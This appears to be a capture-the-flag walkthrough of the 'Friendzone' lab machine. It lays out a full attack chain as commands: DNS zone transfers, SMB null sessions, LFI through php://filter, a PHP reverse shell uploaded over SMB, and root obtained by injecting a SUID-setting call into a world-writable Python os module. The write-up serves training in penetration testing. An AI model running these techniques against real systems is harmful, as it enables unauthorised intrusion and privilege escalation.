💥Cyb3rBook

Search

SearchSearch

FRIENDZONE

Apr 10, 202531 min read

PRIMARY CATEGORY → EASY

Summary

  • DNS Zone Transfer Attack (Dig)
  • SMB Enumeration (Netexec - SMBMap - SMBClient)
  • Common Name Extraction from TLS Certificate (OpenSSL Client)
  • Web Content Fuzzing (Gobuster)
  • LFI using the PHP Wrapper PHP://Filter to extract the PHP Scripts’ Content
  • RCE via File Upload through SMB + LFI
  • Privesc via Information Leakage
  • Privesc via Python Library Hijacking + Cron Job

Setup

Directory creation with the Machine’s Name

mkdir Friendzone && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

mkt

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

  • About 64 → Linux
  • About 128 → Windows
ping -c1 10.129.77.162

As mentioned, according to the TTL, It seems that It is a LINUX Target

Port Scanning
General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.77.162

Open Ports → 21, 22, 53, 80, 139, 443 and 445

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

extractPorts allPorts

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

nmap -p21,22,53,80,139,443,445 -sCV -vvv -n -Pn --disable-arp-ping -oN targeted 10.129.77.162
OS Version (Codename)

In Linux Systems, the Operative System Version could be extracted through Launchpad

According to the Version Column Data of the Comprehensive Scan, proceed as follows →

  • 22 - SSH

Reference

OpenSSH 7.6p1 Ubuntu 4 site:launchpad.net
  • 80 - HTTP

Reference

Apache httpd 2.4.29 site:launchpad.net
  • 443 - HTTPS

Reference

Apache httpd 2.4.29 site:launchpad.net

Codename → Ubuntu Bionic

This can be verified once the shell is obtained, i.e. the system has been compromised

There are several ways to carry out it →

cat /etc/os-release
hostnamectl # If System has been booted via Systemd
lsb_release -a
cat /etc/issue
cat /proc/version
22 - SSH

OpenSSH Version → v7.6

The Version of the Service running can also be obtained via Banner Grabbing as follows →

nc -vn 10.129.77.162 22 <<< ""
CVE-2018-15473

All the OpenSSH Versions prior to the 7.7v one are vulnerable to a System User Enumeration

Reference

CVE-2018-15473OpenSSH < v7.7

searchsploit ssh user enumeration

To get the ExploitDB links related to above exploits →

searchsploit --www ssh user enumeration

Exploit → OpenSSH < 7.7 - User Enumeration (2)

To examine it →

searchsploit --examine linux/remote/45939.py |& cat --language python

This exploit requires Python2

Then, execute it as follows →

searchsploit --mirror linux/remote/45939.py
mv "${_##*/}" ssh_exploit.py
python2 !$

In this case, nothing interesting is extracted

21 - FTP

Like always, we start checking whether Anonymous FTP login is enabled to be able to extract any sensitive data

ftp -a 10.129.77.162 21

If the above command’s output is not too much clear, you can also use wget to try to download the content of the FTP directory recursively

wget --mirror --ftp-user='anonymous' --ftp-password='' "ftp://10.129.77.162:21"

As we can see, it seems that the Anonymous FTP login is not enabled

There is nothing else we can check except the FTP Service Version, It may be vulnerable

FTP Service and Version → vsftpd 3.0.3

We use searchsploit for this task

searchsploit vsftpd

There is nothing interesting for the version we have, we will not get anything from the Remote Denial of Service either

53 - DNS

The DNS Service Version has been extracted before with Nmap

We can also extract it using dig

dig CHAOS TXT version.bind @10.129.77.162 +short

We can search for known exploits or CVEs for that version but we will not find anything

At the moment we have no valid domain to try a DNS Zone Transfer or use dig with ANY to get some DNS registers from the specified domain’s DNS Zone

139, 445 - SMB

Let’s grab some information about the target, such as the hostname and some aspects related to the exposed SBM Service using netexec

nxc smb 10.129.77.162

The host is not a Windows machine, but at least we have its name

Therefore, let’s add this name to the /etc/hosts file so that we can refer to this machine by its name instead of by its IP Address

printf "\n10.129.77.162\tfriendzone\n" >> /etc/hosts
Shared Resources Enumeration

We can continue with netexec and list the Target’s Shared Resources

Since we do not have any valid credentials yet, just proceed with a Null Authentication to see if we get something

nxc smb friendzone --username '' --password '' --shares

We are able to list the Shared Resources through a SMB Null Authentication

Note that we can achieve the same using othe tools such as smbclient or smbmap

  • SMBClient
smbclient --user '' --no-pass --list friendzone
  • SMBMap
smbmap -H friendzone -u '' -p ''

According to the above results, we have read perms on General and read and write perms on Development

As said, take into account that we have write permissions on a shared resource

We can enumerate this resources using the previous tools

With smbclient we can stablish an interactive SMB session to navigate between all the resources contained within the shared folder

But this time, I think It is better to use smbmap or netexec with the spider_plus module to list all their contents

  • SMBMap
smbmap -H friendzone -u '' -p '' -r 'general'
smbmap -H friendzone -u '' -p '' -r 'Development'
  • Netexec - Splider_plus Module
nxc smb friendzone --username '' --password '' --module spider_plus --share 'general'
cat --language json -- /tmp/nxc_hosted/nxc_spider_plus/10.129.77.162.json

There is nothing inside the Development folder, so we will not perform the same scan with netexec as we have done with the General one

Unlike the Development folder, the General folder has one file named creds.txt

Simply download it and inspect its content

smbmap -H friendzone -u '' -p '' --download 'general/creds.txt'

It seems that we have credentials to log in somewhere as the Admin user

Now, we can try to authenticate with that user in SSH, FTP and SMB to see if we can gain access to the target or at least enumerate more resources

But, unfortunately, this credentials does not work in any of above services

So, let’s move to the Web Services!

443 - HTTPS

The HTTPS service uses certificates to encrypt the connection between client and server

This certificates are issued for one or more Common Names. Therefore, we can use openssl to extract those Common Names

openssl x509 -noout -subject < <( openssl s_client -connect 10.129.77.162:443 2> /dev/null 0>&2 )

And we are able to extract the domain Friendzone.red

Thus, we can also add this one to the /etc/hosts file

printf "10.129.77.162\tfriendzone.red" >> /etc/hosts
53 - DNS

Now that we have a valid domain, we can try to carry out a DNS Zone Transfer using dig

dig axfr friendzone.red @10.129.77.162

Filter by all the DNS Register’s Name as follows →

dig axfr friendzone.red @10.129.77.162 | grep -iPo -- '^[^;](\w+\.)+\s' | sort -u

Let’s add all this subdomains to the /etc/hosts file

printf "\t%s" "$( dig axfr friendzone.red @10.129.77.162 | grep -iPo -- '^[^;](\w+\.)+\s' | sort -u | xargs | tr ' ' '\t' )" >> /etc/hosts

Note that all this subdomains can are configured in the Apache Web Server as Virtual Hosts. In that case, different content will be delivered to the client depending on the Virtual Host for which the request is made

80, 443 - HTTP[s]

Let’s examine the Web Technologies that are running in the Web Server using whatweb

whatweb http://10.129.77.162

Another domain is leaked in the source code of this website → Friendzoneportal.red

As always, let’s add this one to the /etc/hosts file too

printf "\n10.129.77.162\tfriendzoneportal.red" >> /etc/hosts
53 - DNS

Before continue to list the Web Server, let’s try another DNS Zone Transfer with the domain obtained

dig axfr friendzoneportal.red @10.129.77.162

To filter again by the DNS Registers’ Name, proceed as follows →

dig axfr friendzoneportal.red @10.129.77.162 | awk '/^[^;]/ {print $1}' | sort -u

Again… add those subdomains in the /etc/hosts file 😅

printf "\t%s" "$( dig axfr friendzoneportal.red @10.129.77.162 | awk '/^[^;]/ {print $1}' | sort -u | xargs )" >> /etc/hosts
80, 443 - HTTP[s]

Continue with whatweb on the 443 Port

whatweb https://10.129.77.162

We get a 404 Not Found HTTP Error

Let’s apply the same for both domains

whatweb http://{friendzone,friendzoneportal}.red
whatweb https://{friendzone,friendzoneportal}.red

Nothing interesting is reported, we already know that the Web Server is an Apache

10.129.77.162:80

From the Browser →

We have seen before that domain using whatweb

There is nothing in the Source Code either

10.129.77.162:443

The whatweb tool reported that this URL returns a 404 Not Found HTTP Error

Friendzone.red:80

The same content as here

Friendzone.red:443

From the Browser →

In this case, some information is leaked in the Source Code

Reference is made to the following URLhttps://friendzone.red/js/js

The following content is displayed →

That string looks strange, it seems to be base64-encoded, but we get nothing if we decoded it

Friendzoneportal.red:80

The same content as here

Friendzoneportal.red:443

From the Browser →

There is nothing interesting in the Source Code either

Subdomains

If we carry out the same task with all the subdomains found through DNS Zone Transfer for both domains, friendzone.red and friendzoneportal.red, we get the same content as http://10.129.77.162:80 in most of them

However, things change for the following ones →

We get the following content from the browser:

It seems that we can upload images. We could think about upload a WebShell or something similar

But first, we need to know if there is any Sever-Side Programming Language running and the path where the uploaded files are stored

whatweb https://uploads.friendzone.red./

Whatweb does not report anything about a Programming Language running such as PHP, Python or JS

Nevertheless, we can try to apply Fuzzing and see if we get the uploaded files’ web path or another interesting resources

gobuster dir --threads 150 --add-slash --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://uploads.friendzone.red./ -k

We find a directory /files/, but when accessing it from the browser, it does not respond and generates a timeout

A login panel is displayed →

We can try to log in with the credentials we obtained earlier via SMB

Credentials → admin:WORKWORKHhallelujah@#

But we get the following response

There is nothing in the source code either

We also were not assigned a session cookie

Therefore, it appears that the login functionality is not yet implemented

Here we have another login panel, but this one seems to different

Let’s test the credentials we have again

Unlike the last login panel, with this one we have successfully logged in and a Session Cookie has been set

It says that we have to visit /dashboard.php, let’s do it!

It displays the following content →

It seems that we can refer to images and pagenames in those URL Parameters

The image_name parameter may be related to the page we inspect earlier where we could upload images

While we inspect the functionality of this page, I would run another gobuster to see if we can discover some PHP resources

Remember that earlier we have logged in thanks to a login.php script and now we are inspecting a dashboard.php script. So, It’s obvious that PHP is the Server-Side Language Program in this case

We can verify this statement through the Wappalyzer Browser Add-on

Thus, let’s run gobuster again, but this time specifying as extension PHP

gobuster dir --threads 150 --output webScan_administrator1_friendzone_red --wordlist /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt --extensions php --url https://administrator1.friendzone.red/ -k

We discover the following resources →

  • Login.php

We have already seen it

  • Dashboard.php

We are currently in it

  • Timestamp.php

It appears that It displays an specific timestamp. There is no functionality other than that

Exploitation

RCE via File Upload through SMB + LFI
Local File Inclusion through PHP://Filter

If we test the functionality mentioned in the Web Page using the indicated URL Parameters, we will get the following content →

If we pay attention, it looks like the timestamp.php resource is being included in the HTTP Response Body

Since we have referenced this file in the pagename URL parameter of the dashboard.php script, we can try to point to other resources such as the ones listed above with gobuster

If we request the following content trying to include the login.php resource →

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

We receive the following HTTP Response

It is the same response that we get in the login.php resource if we log in incorrectly. So, we can verify that a LFI is happening here

Let’s try to extract the dashboard.php’s PHP Code using the following PHP Wrapperphp://filter

This PHP Wrapper allows us to obtain the PHP Script’s code in base64 format, to decode it afterwards

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login

Content displayed →

Here we go! It works! We can do the same with the rest and decode the whole strings encoded in base64 to check if there is a bug in the PHP Code or an information leakage such as passwords, database connection…

  • Login.php
  • Timestamp.php
  • Dashboard.php

Inspecting the PHP Code of the dashboard.php script, we can confirm what we said before, this snippet concatenates a .php extension to the value of the pagename parameter and passes all this as argument to the include() function

Apart from that, there is nothing else interesting, no juicy comments, passwords or database connections…

Arbitrary File Upload via SMB

However, remember that we have write permissions on one of the Shared Resources via SMB

If we are able to know what is the system path where the files we upload are stored, we could point to them through the LFI we already have

Let’s take a look back and analyze again the shared folders that we listed earlier

smbmap -H friendzone -u '' -p ''

In the comments sections, we have one that stands out above the rest

“FriendZone Samba Server Files /etc/Files”

This is related to the Files shared folder, which we can assume to be located in /etc and therefore its full path is /etc/Files

Although we do not know anything about the location of the Development shared folder, which is where we have write permissions, we could also assume that is in /etc, being its full path /etc/Development

Therefore, assuming that the PHP OpenBaseDir Directive is set to None or that the /etc path is included in it, let’s create a PHP Reverse Shell to upload it in the Development shared folder and point to it using the LFI

nvim reverse.php
smbmap -H friendzone -u '' -p '' --upload './reverse.php' 'Development/reverse.php'

Check if the reverse shell has been uploaded correctly →

smbmap -H friendzone -u '' -p '' -r 'Development'

Everything seems to be ok, just set up a listener in your machine with the TCP Port you specified in the PHP Reverse Shell and point to the uploaded file using its full path and let’s see what happens

  • From the Attacker
nc -nlvp 443
  • Dashboard.php →
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/reverse

And here we go! We are in!

Shell as Web User

Once a connection via Reverse Shell is stablished, just proceed as follows to upgrade the obtained shell to a Fully Interactive TTY

Reference

Script
script /dev/null -c bash
<C-z>
stty raw -echo ; fg
reset xterm
export TERM=xterm-256color
export SHELL=/bin/bash
. /etc/skel/.bashrc
stty rows <ROWS> columns <COLUMNS>

Privesc #1

Initial Non-Privileged User → www-data

Information Leakage (Database Connection)

Right now, we are in as www-data

id
sudo -l

We are not part of any sensitive group and we do not have the password of the user www-data, therefore, we cannot see if this user has any sudo privileges

If we inspect the files in /var/www, we see different directories that correspond each one to an Apache Virtual Host through the Document Root directive

But we see another interesting file called mysql_data.conf. It may contain credentials since it’s a configuration file

cat mysql_data.conf

We can check if there is a user called friend as follows →

ls -l /home

Or

grep -i -- sh\$ /etc/passwd

And yes, there is

Just check if the credentials we have found in that configuration file are valid for that user

su - friend

And yes again! We are the friend system user

Just grab the user.txt flag’s content and continue 😊

Privesc #2

Non-Privileged User → friend

Python Library Hijacking + Cron Job

Once we are friend, let’s inspect our home directory to see if there is any juicy data in any file

find . -ls

Nothing interesting, we also have to check SUID or SGID Binaries and Capabilities

find / -type f -user root -perm 4755 -ls 2> /dev/null
command -V getcap && getcap -r / 2> /dev/null

There are no interesting SUID Binaries to privesc and we cannot list the system capabilites for any binary

Let’s see if there are any declared Cron Jobs in the /etc/crontab file or systemctl timers

grep -iP -- '^[^#].+' /etc/crontab
systemctl list-timers

There is nothing relevant here either

Cron Job and Recurring Tasks Enumeration using PSPy

Download the PSPy binary from your machine and transfer it to the target. Then we can run it and monitor the processses running on the system recurrently

  • From the Attacker
curl --silent --request GET --remote-name --location "https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64"
python3 -m http.server 8888
  • From the Target
command -V wget && wget "http://10.10.16.34:8888/pspy64" -O pspy64
chmod 700 !$ && ./pspy64

Once the binary is launched and starts monitoring the running processess in the system, one of them stands out

We can see that there is a Python script called reporter.py that is executed by the user with UID 0, i.e. Root

  • /opt/server_admin/reporter.py permissions
ls -l /opt/server_admin/reporter.py

/opt/server_admin/reporter.py content

Python Library Hijacking

Reference

Rememeber that there are different scenarios where we can abuse this attack vector

Here, we have seen that we do not have permission to execute or modify the python script. We can only see its content

But, thanks to the read permission, we know that the script imports the os python module

Thus, let’s locate this python module in the file system and check if we have write permission on it

find / -iname 'os.py*' -type f -ls 2> /dev/null

Note that Others have full permissions on the /usr/lib/python2.7/os.py file

This module is related to python2.7

The script is being executed by Root using the /usr/bin/python binary

Let’s check the versión of python that corresponds to it

ls -l $( command -v python )

It is Python2.7 ! Note that we have full permissions on the Python2.7’s Os module

Therefore, we can proceed to modify this python module and, for example, add a line that grants the SUID special permission to the /bin/bash binary

In this case, since we are editing the os module, which is normally used to execute system commands, we will import the subprocess module and use the subprocess.call method/function

vi /usr/lib/python2.7/os.py
  • Code Snippet added →
import subprocess
subprocess.call(["chmod", "4755", "/bin/bash"])

We can monitor the /bin/bash permissions as follows →

watch -n2 ls -l /bin/bash

Or →

while : ; do ls -l /bin/bash ; sleep 2 ; clear ; done

Wait for the Cron Job to run again and then… Boom! We have the SUID permission assigned to the /bin/bash binary!

ls -l /bin/bash

The only thing left to do is to launch a /bin/bash instance in a privileged way and become Root

bash -pi
whoami

Get the content of the root.txt flag and move on to the next machine! 😊

cat /root/root.txt

Graph View

Backlinks